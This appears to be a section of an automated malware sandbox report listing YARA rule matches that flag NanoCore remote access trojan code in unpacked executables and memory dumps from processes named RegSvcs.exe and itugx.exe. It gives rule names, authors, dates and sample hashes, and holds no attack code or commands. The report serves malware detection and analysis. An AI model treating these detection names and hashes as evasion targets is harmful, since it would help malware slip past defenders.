      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
